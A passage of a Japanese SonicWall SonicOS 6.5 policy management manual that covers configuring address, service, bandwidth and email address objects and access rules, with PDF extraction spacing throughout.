ア ド レス オブジ ェ ク ト が 初に作成された時点では、 *.youtube.com は 208.65.153.240、208.65.153.241、 208.65.153.242 の IP アドレスに解決されますが、 内部ホス トが youtube.com ドメ イン内のすべての要素に対応する各ホス トの解決を開始した後は、 v87.youtube.com サーバ

サンプルのアクセス ルール

設定 アクセス ルール 1 アクセス ルール 2 アクセス ルール 3 アクセス ルール 4

許可 / 拒否 許可 禁止 許可 禁止

送信元ゾーン WLAN WLAN WLAN WLAN

送信先ゾーン LAN LAN LAN LAN

サービス MediaMoose サービス

MediaMoose サービス

すべて すべて

送信元 ハンドヘルド機器 すべて ハンドヘルド機器 すべて

送信先 10.50.165.2 10.50.165.2 すべて すべて

許可ユーザ すべて すべて すべて すべて

スケジュール 常に有効 常に有効 常に有効 常に有効

メモ : この例では、 ハンドヘルド機器によって使用される特定のアプリケーシ ョ ンを表すために 「MediaMoose サービス」 というサービスを使用しています。 固有サービスの宣言

はオプシ ョ ンであり、 必要に応じて行って ください。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定203

(208.65.154.84) のエン ト リなど、 内部ホス トからの問い合わせによって取得されたホス ト エン

ト リが追加されていきます。

ステップ 2 - 帯域幅オブジェク ト を作成する

帯域幅オブジェク ト を作成するには :

1 管理ビューで、 「ポリシー | オブジェク ト > ア帯域幅オブジェク ト」 ページを開きます。

2 「追加」 を選択し、 次の帯域幅オブジェク ト を作成します。

手順 3 - アクセス ルールの作成

アクセスルールを作成するには :

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 ページを開きます。

2 「追加」 を選択し、 次のアクセス ルールを作成します。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定204

一般画面 :

帯域幅管理画面 :

メモ : 「セキュリティ設定 | ファイアウォール設定 > 帯域幅管理」 ページで、 「帯域幅管理

の種別」 が 「詳細」 に設定されている場合にのみ、 帯域幅オブジェク トを選択できます。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定205

アクセス ルールが作成された後、 「アクセス ルール」 テーブル内に、 帯域幅管理が有効であ

ることを示す帯域幅管理アイコンと統計情報が表示されるようになります。 マウス ポインタを

アイコンの上に移動すると、 帯域幅管理設定が表示されます。

*.youtube.com のすべてのホス トに対するアクセスは、 どのプロ ト コルを使用している場合

でも、 累積的に、 すべてのユーザ セッシ ョ ンで利用可能な合計帯域幅の低率 1 MBP までに制限

されます。

メモ : 「帯域幅管理」 ボタンが表示されない場合は、 WAN インターフ ェースで帯域幅管

理を有効にします。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定206

8

サービス オブジェク トの設定

• オブジェク ト > サービス オブジェク ト (207 ページ)

• 既定のサービス オブジェク トおよびグループ (208 ページ)

• 定義済み IP ユーザ定義サービス オブジェク ト用の プロ ト コル (209 ページ)

• 定義済みプロ ト コルを使用したサービス オブジェク トの追加 (211 ページ)

• カスタム IP 種別サービスの追加 (212 ページ)

• ユーザ定義サービス オブジェク トの編集 (216 ページ)

• ユーザ定義サービス オブジェク トの削除 (217 ページ)

• ユーザ定義サービス グループの追加 (217 ページ)

• ユーザ定義サービス グループの編集 (218 ページ)

• ユーザ定義サービス グループの削除 (218 ページ)

オブジェク ト > サービス オブジェク ト

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定207

サービス オブジェク ト とサービス グループは、 管理 ビューの 「ポリシー | オブジェ ク ト > サービス

オブジェク ト」 ページで設定します。

SonicOS では拡張 IP プロ ト コルがサポート されており、 ユーザはこれらのカスタム プロ ト コルに基づ

いてサービス オブジェ ク ト、 サービス グループ、 およびアクセス ルールを作成できます。 定義済み

のプロ ト コルの一覧は、 定義済み IP ユーザ定義サービス オブジェ ク ト用の プロ ト コル (209 ページ)を参照して く ださい。 ネッ トワークに必要な固有の IP プロ ト コルを追加するには、 カスタム IP 種別

サービスの追加 (212 ページ) を参照して ください。

SonicWall セキュ リテ ィ装置では、 ネッ トワークへのト ラフ ィ ッ クの許可または拒否を決定するアク

セス ルールを設定するために、 サービスを使用します。 SonicWall セキュ リテ ィ装置には、 事前定義

された既定のサービス オブジェ ク ト と既定のサービス グループが用意されています。 既定のサービ

ス オブジェク ト とサービス グループは編集可能ですが、 削除することはできません。

特定の業務上の要件に合わせてユーザ定義サービス オブジェ ク トやユーザ定義サービス グループを

作成することができます。

ページの上部にある 「ビュー」 ド ロップダウン リス ト を使用すると、 規定およびユーザ定義サービ

ス オブジェ ク トおよびグループの表示を制御できます。 「すべての種類」 を選択してユーザ定義エ

ン ト リ と既定のエン ト リを表示し、 「ユーザ定義」 を選択してユーザ定義のみを表示するか、 「既定」 を選択して既定のサービス エン ト リのみを表示します。

既定のサービス オブジェク トおよびグループ既定のサービス オブジェク ト とグループは SonicOS であらかじめ定義されており、 削除はできません

が編集することはできます。 既定のサービスではポートのみを編集できます。 既定のサービスグループでは、 含まれているサービスまたは除外されているサービスを変更できます。

「サービス オブジェ ク ト」 および 「サービス グループ」 テーブルには、 サービス オブジェ ク ト と

サービス グループに関する以下の属性が表示されます。

名前 サービスの名前。

プロ ト コル サービスのプロ ト コル。

開始ポート サービスの開始ポート番号。

終了ポート サービスの終了ポート番号。

クラス エン ト リが 「既定」 (システム) のサービスか 「ユーザ定義」 (ユーザ) サービスかを示

します。

コ メン ト コ メ ン ト アイコンの上をマウスでポイン トすると、 サービス オブジェ ク ト またはグ

ループに関する情報が表示されます。 ポップアップには以下の各項目が表示されます。

• 「参照先」 - サービス オブジェク トまたはグループを使用するファイアウォールに設定されているルールまたはポリシーのタイプのリストが、 各種別の参照の数と ともに表示されます。 ルールまたはポリシータイプは、 利用可能な場合に、「アクセスルール」 、 「NAT ポリシー」 などのよ うにリンク と して表示されます。 リンクをクリ ックすると、 ページに移動して、 サービス オブジェク トまたはグループを使用した特定のルールまたはポリシーのリストを表示できます。

• 「グループ (所属先)」 - サービス オブジェク トまたはグループを含むサービスグループまたは他の種別のグループのリス トが表示されます。

設定 サービスの 「編集」 アイコンと 「削除」 アイコンを表示します (既定のサービスは削

除できず、 それに対応する 「削除」 アイコンは淡色表示になっています)。 「編集」 ア

イコンを選択すると、 「サービスの編集」 ダイアログが表示されます。 既定のサービスではポートのみを編集できます。 既定のサービスグループでは、 含まれているサービスまたは除外されているサービスを変更できます。

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定208

既定のサービス グループは、 既定のサービス オブジェク トおよび/または他の既定のサービス グルー

プのグループです。 グループ名表示の左側にある三角形 を選択すると、 グループに含まれているす

べての既定のサービスとグループが表示されます。 たとえば、 「AD ディ レク ト リ サービス」 の既定

のグループには、 い くつかのサービスオブジェク ト とサービスグループが含まれています (AD ディ レ

ク ト リ サービス グループの詳細参照)。 これらの複数のエン ト リをまとめてグループ化することで、

SonicOS を通してルールとポリシーで単一のサービスとして参照できます。

AD ディ レク ト リ サービス グループの詳細

定義済み IP ユーザ定義サービス オブジェク ト用の プロ ト コル

ICMP (1) インターネッ ト制御メ ッセージ プロ ト コル。 エラー メ ッセージと制御メ ッセージの送

信に使用される TCP/IP プロ ト コルです。

IGMP (2) インターネッ ト グループ管理プロ ト コル。 TCP/IP ネッ トワークにおけるマルチキャス

ト グループの管理を制御するプロ ト コルです。

TCP (6) 転送制御プロ ト コル。 TCP/IP の TCP 部分です。 TCP は TCP/IP の転送プロ ト コルです。 TCPにより、 メ ッセージが正確に、 欠けることな く送信されます。

UDP (17) ユーザ データグラム プロ ト コル。 TCP/IP プロ ト コル スイートに含まれるプロ ト コルで

す。 信頼性の高い送信が不要な場合に、 TCP の代わりに使用されます。

6over4 (41) 明示的な ト ンネルのないIPv4 ド メ イン上での IPv6 の送信。 6over4 ト ラ フ ィ ッ クは、 IPヘッダーの IP プロ ト コル番号が 41 に設定された IPv4 パケッ ト内で送信されます。

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定209

GRE (47) 汎用ルーテ ィ ング カプセル化。 IP ト ンネル内のさまざまな種類のプロ ト コル パケッ ト

をカプセル化するために使用される ト ンネル プロ ト コルです。 フ ァイアウォールへの

仮想ポイン ト ツーポイン ト リンクの作成や、 IP インターネッ トワーク経由での機器の

ルーティングに使用されます。

ESP (50) カプセル化セキュリテ ィ ペイロード。 IPSec による柔軟なデータ転送手段と して使用さ

れる、 別のデータグラム内の IP データグラムをカプセル化する手法です。

AH (51) 認証ヘッダー。 データ認証に加え、 オプシ ョ ンでアンチリレー サービスを提供するセ

キュリテ ィ プロ ト コルです。 AH は保護するデータに埋め込みます (完全な IP データグ

ラム)。

ICMPv6/ND(58)

インターネッ ト メ ッセージ制御プロ ト コル バージ ョ ン 6 向けの近隣者発見。 近隣者発

見は、 次の 5 つの異なる ICMP パケッ ト タイプを定義します。 ルータ要請メ ッセージと

ルータ広告メ ッセージのペア、 近隣者要請メ ッセージと近隣者広告メ ッセージのペア、およびリダイレク ト メ ッセージ。

EIGRP (88) 拡張内部ゲートウェイ ルーテ ィ ング プロ ト コル。 IGRP を拡張したプロ ト コルです。 優

れた収束特性と動作効率を実現し、 リンク状態プロ ト コルの利点と距離ベク トル プロ

ト コルの利点を同時に備えています。

OSPF (89) オープン ショーテスト パス ファースト。 ノード間の距離およびいくつかの品質パラメー

タに基づいて、 TCP/IP ネッ トワークにおける IP ト ラフ ィ ッ クのルーテ ィ ングに 適なパ

スを決定するルーテ ィ ング プロ ト コルです。 OSPF は内部ゲートウェイ プロ ト コル (IGP)の 1 つであり、 自律システムの内部で動作するように設計されています。 また、 OSPF はRIP プロ ト コルを置き換えるために開発されたリンク状態プロ ト コルであり、 RIP プロ ト

コル (距離ベク トル プロト コル) よりも少ないルータ数でト ラフ ィ ックを更新できます。

PIM (103) プロ ト コル非依存マルチキャスト。 2 つある PIM 動作モードの 1 つです。

• PIM スパース モード (PIM-SM) では、 ネッ トワーク内の 小限のルータがデータを受け取るように、 データの配信が制限されます。 パケッ トは、 RP (ランデブー ポイン ト ) で明示的に要求された場合にのみ送信されます。 スパース モードでは、受信側が広く分散しているため、 ダウンス ト リームのネッ トワークに送信されたデータグラムは必ずしも使用されないと想定されます。 スパース モード使用の代償と しては、 明示的な Join メ ッセージの定期更新に依存しているこ と と、 RPが必要であることです。

• PM デンス モード (PIM-DM) では、 下流側のすべてのルータおよびホストが送信者からのマルチキャスト データグラムを受信すべきであると仮定し、 ネッ トワーク全域にマルチキャスト ト ラフ ィ ッ クのフラッ ドを発生させます。 下流に近隣ルータがないルータは、 不要な ト ラフ ィ ッ クを削除します。 データグラムの反復的なフラッ ド とその後の削除を 小限に抑えるために、 PIM DM では、 送信元に直接接続しているルータによって送信される状態の再表示メ ッセージを使用します。

メモ : フ ァイアウォールは、 マルチキャス ト ト ラフ ィ ッ クが上流/下流インターフ ェー

スを通過できるよ うに、 マルチキャス ト プロ ト コルと してのみ設定できます。 フ ァイ

アウォールは PIM ルータの役割を果たすことができません。

L2TP (115) レイヤ 2 ト ンネリング プロ ト コル。 PPP セッシ ョ ンをインターネッ ト経由で実行するた

めのプロ ト コルです。 L2TP には暗号化機能はありませんが、 リモート ユーザから企業

LAN への仮想プライベート ネッ トワーク (VPN) 接続を確立するために既定で IPsec が使

用されます。

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定210

定義済みプロ ト コルを使用したサービス オブジェ

ク トの追加任意の定義済みプロ ト コルまたはサービス タイプに、 ユーザ定義サービスを追加できます。

これらのプロ ト コルの定義については、 定義済み IP ユーザ定義サービス オブジェク ト用の プロ ト コ

ル (209 ページ) を参照して ください。

作成したユーザ定義サービスは、 すべて 「サービス オブジェ ク ト」 テ ーブルに一覧表示されます。

ユーザ定義サービス グループを作成してユーザ定義サービスをグループ化するこ とで、 より簡単に

ポリシーを適用するこ とができます。 既定のサービス オブジェ ク トにリス ト されていないプロ ト コ

ルは、 ユーザ定義サービス オブジェク トに追加できます。

定義済みプロ ト コルを使用してユーザ定義サービス オブジェク トに追加するには:

1 管理ビューで、 「ポリシー | オブジェク ト > サービス オブジェク ト」 ページを開きます。

2 必要に応じて、 「サービス オブジェク ト」 ボタンをクリ ッ クして、 「サービスオブジェク ト」

画面を表示します。

3 「追加」 ボタンを選択します。 「サービスの追加」 ダイアログが表示されます。

4 このサービス オブジェク トに付ける説明的な名前を 「名前」 フ ィールドに入力します。

5 「プロ ト コル」 ドロップダウン メニューで、 IP プロ ト コルの種類を選択します。 ダイアログの

フ ィールドが変更されることがあります。

定義済みサービス タイプ

プロ ト コル IP 番号

ICMP 1

IGMP 2

TCP 6

UDP 17

6over4[l2tp] 41

GRE 47

IPsec ESP 50

IPsec AH 51

ICMPv6/ND 58

EIGRP 88

OSPF 89

PIM 103

L2TP[l2tp] 115

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定211

6 次に入力する内容は、 選択した IP プロ ト コルによって異なります。

• TCP プロ ト コルと UDP プロ ト コルの場合、 ポート範囲を指定します。

• ICMP、 IGMP、 OSPF、 および PIM プロト コルの場合、 「サブ種別」 ドロップダウン メニュー

からサブ種別を選択します。

• その他のプロ ト コルの場合、 それ以上の指定を行う必要はありません。

7 「追加」 を選択します。 「サービス オブジェク ト」 テーブルにサービスが表示されます。

8 「閉じる」 を選択します。

カスタム IP 種別サービスの追加定義済み IP プロ ト コル タイプのみを使用している場合、 セキュリテ ィ装置でその他の IP プロ ト コル

タイプのト ラフ ィ ッ クが検出されると、 そのト ラフ ィ ッ クは 「識別不能」 と して破棄されます。 ただし、 IANA (Internet Assigned Numbers Authority: http://www.iana.org/assignments/protocol-numbers) により

管理されている膨大な数の登録済み IP 種別のリス トがあります。 一般的でない (識別不能な) IP 種別

ト ラフ ィ ックは厳格に削除する方が安全ではありますが、 機能が制限されます。

SonicOS では、 任意の IP 種別を表すサービス オブジェク ト を作成できます。 これにより、 任意の種別

の IP ト ラフ ィ ッ クを認識および制御するファイアウォール アクセス ルールを作成できます。

認識と処理を実現するには、 設定例 (212 ページ) に示すよ うに、 そのカスタム IP 種別サービス オブ

ジェク トのみを含むアクセス ルールを作成する必要があります。

設定例管理者が、 RSVP (リソース予約プロ ト コル - IP タイプ 46) および SRP (Spectralink ラジオ プロ ト コル - IP タイプ 119) を WLAN ゾーン (WLAN サブネッ ト ) の全クライアン トから LAN ゾーン (例えば 10.50.165.26など) のサーバまで許可する必要があると します。 管理者は、 この 2 つのサービスを扱うユーザ定義

IP 種別 サービス オブジェク ト を定義できます。

ユーザ定義 IP 種別サービス オブジェク ト を定義するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | オブジェク ト > サービス オブジェク ト」 ページを開きます。

2 必要に応じて、 「サービス オブジェク ト」 ボタンをクリ ッ クして、 「サービスオブジェク ト」

画面を表示します。

3 「追加」 を選択します。 「サービスの追加」 ダイアログが表示されます。

メモ : PIM のサブ種別は、 PIM SM 専用である以下のものを除き、 PIM-SM と PIM-DMの両方に適用されます。

• 種別 1: 登録 • 種別 2: 登録停止 • 種別 4: ブートス ト ラ ップ • 種別 8: 候補 RP 広告

メモ : 汎用サービス 「すべて」 では、 カスタム IP 種別サービス オブジェ ク トが処理されませ

ん。 つまり、 IP 種別 126 のカスタム IP 種別サービス オブジェク ト を定義しただけでは、 IP 種別

126 ト ラフ ィ ッ クは既定の LAN > WAN 許可ルールで許可されません。

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定212

4 このサービス オブジェク トに付ける説明的な名前を 「名前」 フ ィールドに入力します。

5 「プロ ト コル」 ドロップダウン メニューから、 「カスタム IP 種別」 を選択します。

6 「プロ ト コル」 ドロップダウン リストの右側のフ ィールドに、 「ユーザ定義 IP タイプ」 のプロ

ト コル番号を入力します。

7 「追加」 を選択します。

8 定義するユーザ定義サービスごとに 手順 4 ~ 手順 7 を繰り返します。

9 終了したら、 「閉じる」 を選択します。

メモ : カスタム IP 種別の場合、 「ポート範囲」 と 「サブ種別」 フ ィールドは、 「カスタ

ム IP 種別」 と して定義できないか、 適用されません。

メモ : 定義済み IP 種別に対してカスタム プロ ト コル種別サービス オブジェク ト を定義し

よう とすると、 許可されず、 次のエラー メ ッセージが表示されます。

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定213

10 「サービス グループ」 ボタンを選択します。

11 「追加」 を選択します。 「サービス グループの追加」 ダイアログが表示されます。

12 「名前」 フ ィールドに、 サービス グループのわかりやすい名前を入力します (例 : myServices)。

13 左側のリストから作成したユーザ定義サービス オブジェク ト を選択し、 右矢印ボタンをクリ ッ

クして右側のリス トに移動します。

ヒン ト : 複数のサービス オブジェ ク ト を選択してから右矢印ボタンを選択すると、 一度

にすべてのサービスを移動できます。

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定214

14 終了したら、 「OK」 を選択します。

15 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

16 「追加」 をクリ ックして、 WLAN サブネッ トが myServices を使用してアクセスできるホスト用の

アドレス オブジェク ト を作成します。

17 管理ビューで、 「ポリシー | ルール > アクセス ルール」 ページに移動して、 「WAN > LAN」 ルー

ルを作成します。

18 「追加」 を選択します。 「ルールの追加」 ダイアログが表示されます。

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定215

19 myServices に WLAN サブネッ トから 10.50.165.26 アドレス オブジェク トへのアクセスを許可す

るアクセス ルールを定義します。

20 「追加」 をク リ ックし、 「閉じる」 をクリ ッ クします。

これで、 IP プロ ト コル 46 および 119 の ト ラ フ ィ ッ クが認識され、 WLAN サブネ ッ ト から

10.50.165.26 への転送が許可されるようになります。

ユーザ定義サービス オブジェク トの編集「設定」 の下にある編集アイコンを選択して、 「サービスの編集」 ダイアログでサービス オブジェ

ク ト を編集します。 このダイアログには、 「サービスの追加」 ダイアログと同じ設定項目があります。 定義済みプロ ト コルを使用したサービス オブジェ ク トの追加またはカスタム IP 種別サービスの

追加を参照して ください。

メモ : 双方向ト ラフ ィ ッ クのためにアクセス ルールを作成する必要がある場合もありま

す。 例えば、 myServices に 10.50.165.26 から WLAN サブネッ トへのアクセスを許可する、

LAN > WAN アクセス ルールを追加する場合も考えられます。

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定216

ユーザ定義サービス オブジェク トの削除削除するサービス オブジェ ク トの行で、 「設定」 の下の 「削除」 アイコンをク リ ッ ク して、 個々の

カスタム サービス オブジェ ク ト を削除します。 「削除」 ボタンをク リ ッ ク して 「すべて削除」 を選

択すると、 すべてのユーザ定義サービスを削除できます。 1 つまたは複数のカスタムサービスオブ

ジェク ト を削除するには、 目的のエン ト リのチェ ックボックスをオンにし、 「削除」 をク リ ッ クし、「選択した項目の削除」 をクリ ッ クします。

ユーザ定義サービス グループの追加ユーザ定義サービスを追加した後で、 サービス (既定のサービスを含む) のグループを作成し、 グルー

プ内のサービスに同じポリシーを適用するこ とができます。 例えば、 特定の時刻または曜日にのみ

SMTP ト ラフ ィ ッ クと POP3 ト ラフ ィ ッ クを許可するには、 この 2 つのサービスをユーザ定義サービス

グループとして追加します。

ユーザ定義サービス グループを作成するには、 以下の手順を実行します。

1 管理ビューで、 「ポリシー | オブジェク ト > サービス オブジェク ト」 ページを開きます。

2 「サービス グループ」 ボタンをクリ ッ クすると、 「サービスグループ」 画面が表示されます。

3 「追加」 を選択します。 「サービス グループの追加」 ダイアログが表示されます。

4 ユーザ定義グループに付ける名前を 「名前」 フ ィールドに入力します。

5 左側の列のリストから、 サービスを個別に選択します。 Ctrl キーを押しながらサービスを選択す

ることで、 複数のサービスを選択することができます。

6 サービスをグループに追加するには、 右矢印ボタンを選択します。

• グループからサービスを削除するには、 右側の列のリス トでサービスを個別に選択します。 キーボードの Ctrl キーを押しながらサービスを選択することで、 複数のサービスを

選択することもできます。

• サービスを削除するには、 左矢印ボタンを選択します。

7 終了したら、 「OK」 を選択します。 グループが 「ユーザ定義サービス グループ」 に追加され

ます。

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定217

ユーザ定義サービス グループの名前の左側にある三角形を選択すると、 そのユーザ定義サービ

ス グループ登録に含まれている個々のユーザ定義サービス、 既定のサービス、 ユーザ定義サー

ビス グループがすべて表示されます。

ユーザ定義サービス グループの編集「設定」 列の編集アイコンを選択し、 「サービス グループの編集」 ダイアログでユーザ定義サービ

ス グループを編集します。 このダイアログには、 「サービス グループの追加」 ダイアログと同じ設

定項目があります。

ユーザ定義サービス グループを展開し、 個々のサービスの編集アイコンを選択して、 グループの

個々のサービスを編集することもできます。 「サービスの編集」 ダイアログが表示されます。 このダイアログには、 「サービスの追加」 ダイアログと同じ設定項目が表示されます。

ユーザ定義サービス グループの削除削除するサービス グループの行で、 「設定」 の下の 「削除 」 アイコンをク リ ッ ク して、 個々のユー

ザ定義サービス グループを削除します。 「削除」 ボタンをク リ ッ ク して 「すべて削除」 を選択する

と、 すべてのユーザ定義サービス グループを削除できます。 1 つ以上のカスタムサービスグループを

削除するには、 目的のエン ト リのチェ ッ クボッ クスをオンにし、 「削除 」 を選択し、 「選択した項

目の削除」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

サービス オブジェク トの設定218

9

帯域幅オブジェク トの設定

• オブジェク ト > 帯域幅 オブジェク ト (219 ページ)

• 帯域幅管理について (219 ページ)

• 帯域幅オブジェク トの設定 (220 ページ)

オブジェク ト > 帯域幅 オブジェク ト

トピック :

• 帯域幅管理について (219 ページ)

• 帯域幅オブジェク トの設定 (220 ページ)

帯域幅管理について帯域幅管理の設定は、 ト ラフ ィ ッ ク等級に対する帯域幅制限を指定するポリシーに基づいています。完全な帯域幅管理ポリシーは、 分類基準と帯域幅ルールという 2 つの部分で構成されます。

分類基準は、 優先順位、 保証帯域幅、 大帯域幅など、 実際のパラメータを指定し、 帯域幅オブジェク ト内で設定されます。 分類基準は、 具体的な基準との照合によってパケッ トの識別と ト ラフ ィ ッ ク等級への分類を行います。

アクセス ルール、 アプリケーシ ョ ン ルール、 およびアクシ ョ ン オブジェク トでの帯域幅オブジェク

トの使用については、 SonicOS セキュリテ ィ設定 の技術文書のファイアウォール設定 > 帯域幅管理セ

クシ ョ ンを参照して ください。

SonicWall SonicOS 6.5 ポリシー管理

帯域幅オブジェク トの設定219

帯域幅オブジェク トの設定

帯域幅オブジェク ト を追加または設定するには:

1 管理ビューで、 ポリシー | オブジェク ト > 帯域幅オブジェク トに移動します。

2 以下のいずれかを実行します。

• 「追加」 ボタンを選択して、 新しい帯域幅オブジェク ト を作成します。

• 編集する帯域幅オブジェク トの行の設定の下の編集ボタンを選択します。

帯域幅オブジェ ク トの追加 または 帯域幅オブジェ ク トの編集ダイアログが表示されます。 ど

ちらのダイアログも同じ設定です。

3 「名前」 フ ィールドに、 帯域幅オブジェク トの説明的な名前を入力します。

4 「保証帯域幅」 フ ィールドに、 この帯域幅オブジェク トがある ト ラフ ィ ッ ク等級への提供を保証する帯域幅の量を入力します。 ドロップダウンリス トから番号を入力し、 レート kbps (キロ

ビッ ト /秒) または Mbps (メガビッ ト /秒) を選択します。

5 「 大帯域幅」 フ ィールドに、 この帯域幅オブジェク トがある ト ラフ ィ ッ ク等級に提供する帯域幅の 大量を入力します。 ド ロ ップダウン リス トから番号を入力し、 レー ト kbps または

Mbps を選択します。

6 「 ト ラフ ィ ッ ク優先順位」 ドロップダウン リス トで、 ある ト ラフ ィ ッ ク等級に対してこの帯域

幅オブジェ ク トが付与する優先順位を選択します。 高の優先順位は 「0 リアルタイム」 で、

これが既定値です。 低の優先順位は 「7 低」 です。

複数のト ラフ ィ ッ ク等級が共有された帯域幅をめぐって競合している場合は、 優先順位が指向の等級に優先権が与えられます。

7 「違反動作」 ドロップダウン リス トで、 ト ラフ ィ ッ クが 大帯域幅の設定値を上回った場合に

この帯域幅オブジェク トが実行する動作を選択します。

• 遅延は既定値で、 過剰なト ラフ ィ ッ ク パケッ ト をキューに登録し、 送信可能になった時

点で送信することを示します。

• 破棄は、 過剰なト ラフ ィ ッ ク パケッ トが直ちに破棄されることを示します。

8 「コ メン ト」 フ ィールドに、 この帯域幅オブジェク トに対するコ メン トまたは説明のテキス トを入力します。

メモ : 複数のト ラフ ィ ッ ク等級が共有された帯域幅をめぐって競合している場合、 実際に割り当てられる帯域幅はこの値よりも少な く なることがあります。

SonicWall SonicOS 6.5 ポリシー管理

帯域幅オブジェク トの設定220

9 「基本」 タブを選択します。

10 「IP 毎帯域幅管理を有効にする」 チェ ッ クボックスを選択します。 このオプシ ョ ンは、 既定で

は選択されていません。 「 大帯域幅」 フ ィールドが有効になります。

IP 毎帯域幅管理を有効にする が有効になっている場合、 大の基本帯域幅の設定は親のト ラ

フ ィ ッ ク等級の下にある個々の IP に適用されます。

11 「 大帯域幅」 の値を入力します (数字)。 既定値は 0 です。

12 関連するドロップダウン リストで、 「kbps」 または 「Mbps」 のいずれかの単位を選択します。

これらのオプシ ョ ンについては、 「セキュリテ ィ設定」 の技術文書の 「フ ァイアウォール設定

> 帯域幅管理」 の下の 「基本帯域幅の設定」 セクシ ョ ンを参照して ください。

13 「OK」 を選択します。

メモ : アクセス ルール での帯域幅オブジェク トの設定は、 詳細帯域幅管理での帯域幅管理の設

定 (22 ページ) およびグローバル帯域幅管理での帯域幅管理の設定 (24 ページ) に記載されていま

す。 動作オブジェ ク ト での帯域幅オブジェ ク トの設定は、 帯域幅管理を用いた動作について

(173 ページ) に記載されています。

SonicWall SonicOS 6.5 ポリシー管理

帯域幅オブジェク トの設定221

10

電子メール アドレス オブジェク トの

設定

• オブジェク ト > 電子メール アドレス オブジェク ト (222 ページ)

• 電子メール アドレス オブジェク トについて (222 ページ)

• 電子メール アドレス オブジェク トの設定 (224 ページ)

オブジェク ト > 電子メール アドレス オブ

ジェク ト

「ポリシータイプ」 が 「SMTPクライアン ト」 の場合、 アプリケーシ ョ ン ルールポリシーで使用する

電子メール アドレス オブジェク ト を作成できます。 電子メール アドレス オブジェク トには、 ユーザ

のリス トまたはド メイン全体を指定できます。

ト ピッ ク :

• 電子メール アドレス オブジェク トについて (222 ページ)

• 電子メール アドレス オブジェク トの設定 (224 ページ)

電子メール アドレス オブジェク トについてアプリケーシ ョ ン制御では、 電子メール アドレス オブジェク ト と して個別電子メール アドレス リス

ト を作成できます。 「ポリシータイプ」 が 「SMTPクライアン ト」 の場合、 アプリケーシ ョ ン ルール

ポリシーで電子メール アドレス オブジェク トのみを使用きます。 電子メール アドレス オブジェク ト

は、 個別ユーザまたはド メ イン全体を表すこ とができます。 さ らに、 個別アド レスのリス ト をオブジェ ク トに追加することで、 グループを表す電子メール アドレス オブジェ ク ト を作成することもで

SonicWall SonicOS 6.5 ポリシー管理

電子メール アドレス オブジェク トの設定222

きます。 これにより、 SMTP クライアン トのアプリケーシ ョ ン ルールを作成するときに、 ユーザ グループを容易に対象に含めたり対象から除外したりできます。

例えば、 サポート グループを表す電子メール アドレス オブジェク ト を作成できます。

電子メール アドレス オブジェク トにグループを定義した後、 そのグループを対象として含める SMTPクライアン ト ポリシーまたは対象から除外する SMTP クライアン ト ポリシーを作成します。

以下の図では、 送信電子メールへの実行可能フ ァ イルの添付を禁止するポリシーからサポー ト グループが除外されています。 電子メール アドレス オブジェ ク トは、 SMTP クライアン ト ポリシーの

「メール送信者」 フ ィールドまたは 「メール受信者」 フ ィールドで使用できます。 「メール送信者」フ ィールドは、 電子メールの送信者を表します。 「メール受信者」 フ ィールドは、 電子メールの受信者を表します。

SonicWall SonicOS 6.5 ポリシー管理

電子メール アドレス オブジェク トの設定223

アプリケーシ ョ ン ルールでは Outlook Exchange または類似のアプリケーシ ョ ンからグループ メンバー

を直接抽出することはできませんが、 Outlook のメンバー リス ト を使用して、 グループ メンバーがリ

ス ト されたテキス ト フ ァイルを作成することはできます。 その後、 このグループの電子メール アド

レス オブジェ ク ト を作成するときに、 「フ ァイルから読み込み」 ボタンを使用してテキス ト フ ァイ

ルからリス ト をインポートできます。 テキス ト フ ァイル内で電子メール アドレスが 1 行に 1 つずつ

記述されていることを確認して ください。

電子メール アドレス オブジェク トの設定

電子メール アドレス オブジェク トの設定を行うには:

1 管理ビューで、 「ポリシー | オブジェク ト > 電子メール アドレス オブジェク ト」 に移動します。

2 ページの上部にある 「追加」 を選択します。 「電子メールアドレスオブジェク トの追加/編集」

ダイアログが表示されます。

SonicWall SonicOS 6.5 ポリシー管理

電子メール アドレス オブジェク トの設定224

3 「電子メール ユーザ オブジェク ト名」 フ ィールドに電子メール アドレス オブジェク トに対す

るわかりやすい名前を入力します。

4 「一致種別」 で、 以下のいずれかを選択します。

• 「完全一致」 - 入力した電子メール アドレスとの厳密な照合を行う場合に使用します。

• 「部分一致」 - 入力した電子メール アドレスの任意の部分で照合を行う場合に使用します。

• 「正規表現一致」 - 正規表現と電子メール アドレスとの照合を行う場合に使用します。 正

規表現については、 正規表現について (156 ページ) を参照して ください。

5 「内容」 フ ィールドに、 照合する内容を入力します。

• 手動の場合:

a) 内容を入力します。

b) 「追加」 を選択します。

c) 必要な要素をすべて追加し終えるまで、 手順 a および手順 b を繰り返します。

例えば、 ド メ インに対して照合を行うには、 前の手順で 「部分一致」 を選択し、「内容」 フ ィールドでド メイン名を @ に続けて入力します (例: @SonicWall.com)。

個々のユーザに対して照合を行うには、 前の手順で 「完全一致」 を選択し、 「内容」 フ ィールドに完全な電子メール アドレスを入力します

(例: [email protected])。

• 要素のリストをテキスト ファイルからインポートするには、 「ファイルから読み込み」 を

選択します。 ファイル内の各要素は、 1 行に 1 つずつ記述されている必要があります。

ユーザのリス ト を含む電子メール アドレス オブジェ ク ト を定義することで、 アプリケーシ ョ

ン ルールを使用してグループをシミ ュレートできます。

6 「OK」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

電子メール アドレス オブジェク トの設定225

11

